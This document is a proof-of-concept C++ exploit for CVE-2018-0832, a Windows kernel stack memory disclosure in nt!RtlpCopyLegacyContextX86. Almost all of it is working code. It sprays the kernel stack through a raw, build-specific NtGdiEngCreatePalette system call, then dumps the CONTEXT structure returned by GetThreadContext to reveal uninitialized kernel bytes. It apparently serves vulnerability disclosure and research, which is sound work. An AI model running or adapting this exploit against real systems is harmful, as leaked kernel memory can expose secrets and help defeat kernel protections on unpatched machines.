
Windows Kernel stack memory disclosure in nt!RtlpCopyLegacyContextX86 (CVE-2018-0832)


Windows Kernel stack memory disclosure in nt!RtlpCopyLegacyContextX86 (CVE-2018-0832). The vulnerability lies in how the CONTEXT structure is copied to user-mode memory: uninitialized kernel stack bytes are leaked in the stack trace and in the _FLOATING_SAVE_AREA structure.


                                                #include <Windows.h>
#include <cstdio>

// For native 32-bit execution.
//
// Minimal raw system-call stub (MSVC inline assembly, x86 only). It loads the
// service number into eax, points edx at the stack slot just past ApiNumber —
// i.e. at the first variadic argument, which is presumably the argument block
// the kernel's dispatcher reads — and traps into the kernel through the
// legacy int 0x2e gate.
// There is no C-level return statement: the caller receives whatever the
// kernel left in eax (presumably an NTSTATUS). Because the number is passed
// raw, it is only meaningful for the exact OS build it was taken from.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
  __asm {mov eax, ApiNumber};       // eax = system-call number
  __asm {lea edx, ApiNumber + 4};   // edx = address of the first variadic argument
  __asm {int 0x2e};                 // legacy software-interrupt system-call gate
}

// Dumps dwBytes bytes starting at Data as a hex + ASCII listing, 16 bytes per
// row. Positions past the end of the buffer in the final row are rendered as
// "??" in the hex column and "." in the text column; in the text column only
// printable ASCII (0x20..0x7e) is shown, everything else as ".".
// In this PoC the buffer is the CONTEXT filled in by the kernel, so the dump
// is where disclosed kernel stack contents become visible.
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
  CONST ULONG kRowLen = 16;

  for (ULONG offset = 0; offset < dwBytes; offset += kRowLen) {
    printf("%.8x: ", offset);

    // Hex column.
    for (ULONG col = 0; col < kRowLen; col++) {
      ULONG idx = offset + col;
      if (idx < dwBytes) {
        printf("%.2x ", Data[idx]);
      } else {
        printf("?? ");
      }
    }

    // ASCII column; never reads Data past dwBytes.
    for (ULONG col = 0; col < kRowLen; col++) {
      ULONG idx = offset + col;
      bool printable = idx < dwBytes && Data[idx] >= 0x20 && Data[idx] <= 0x7e;
      if (printable) {
        printf("%c", Data[idx]);
      } else {
        printf(".");
      }
    }

    printf("\n");
  }
}

// Fills size bytes at ptr with byte. Hand-rolled rather than memset —
// presumably so that no CRT/intrinsic call is involved while the spray buffer
// is prepared; confirm against the author's intent.
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
  PBYTE end = ptr + size;
  while (ptr < end) {
    *ptr++ = byte;
  }
}

// Writes a recognizable pattern into this thread's kernel stack via a raw
// system call, so that uninitialized kernel stack bytes later copied out by
// GetThreadContext can be told apart from legitimate data: a run of 0x41 ('A')
// in the CONTEXT dump is presumably the disclosed kernel stack content.
// Only the system call and a static argument buffer are used, so the pattern
// never lands on the user-mode stack (the 'B' overwrite afterwards makes that
// distinction visible in the dump).
VOID SprayKernelStack() {
  // Windows 10 32-bit version 1709.
  // Raw service number; it is build-specific. On any other build this
  // dispatches a different service (or fails) instead of spraying the stack.
  CONST ULONG __NR_NtGdiEngCreatePalette = 0x1296;

  // Buffer allocated in static program memory, hence doesn't touch the local stack.
  static BYTE buffer[1024];

  // Fill the buffer with 'A's and spray the kernel stack.
  // NOTE(review): the argument layout (mode, color count, color array, three
  // zero flags) looks like EngCreatePalette's parameter list, with the color
  // array being what is copied onto the kernel stack — confirm.
  MyMemset(buffer, 'A', sizeof(buffer));
  SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0);

  // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
  MyMemset(buffer, 'B', sizeof(buffer));
}

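// Reproduction entry point: sprays the kernel stack, asks the kernel for this
// thread's floating-point context, and dumps the returned CONTEXT so that
// kernel stack bytes copied out uninitialized by nt!RtlpCopyLegacyContextX86
// (the _FLOATING_SAVE_AREA part, per the advisory) can be inspected.
// Returns 0 on success, 1 if GetThreadContext fails.
int main() {
  // Initialize the thread as GUI. Loading user32.dll converts this thread to a
  // GUI thread, which is presumably required for the win32k-range system call
  // issued by SprayKernelStack to be dispatched.
  LoadLibrary(L"user32.dll");

  // ContextFlags selects which parts of CONTEXT the kernel fills in;
  // CONTEXT_FLOATING_POINT requests the _FLOATING_SAVE_AREA portion, which is
  // the region the advisory identifies as leaking kernel stack memory.
  CONTEXT ctx;
  RtlZeroMemory(&ctx, sizeof(ctx));
  ctx.ContextFlags = CONTEXT_FLOATING_POINT;

  SprayKernelStack();

  if (!GetThreadContext(GetCurrentThread(), &ctx)) {
    // GetLastError() returns a DWORD (unsigned long); %lu matches it, whereas
    // the previous %d was a format/argument type mismatch.
    printf("GetThreadContext failed, %lu\n", GetLastError());
    return 1;
  }

  // ctx was zeroed above, so any non-zero bytes in fields the kernel did not
  // explicitly initialize — e.g. the 'A' spray pattern — came from the kernel.
  PrintHex((PBYTE)&ctx, sizeof(ctx));

  return 0;
}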

                              
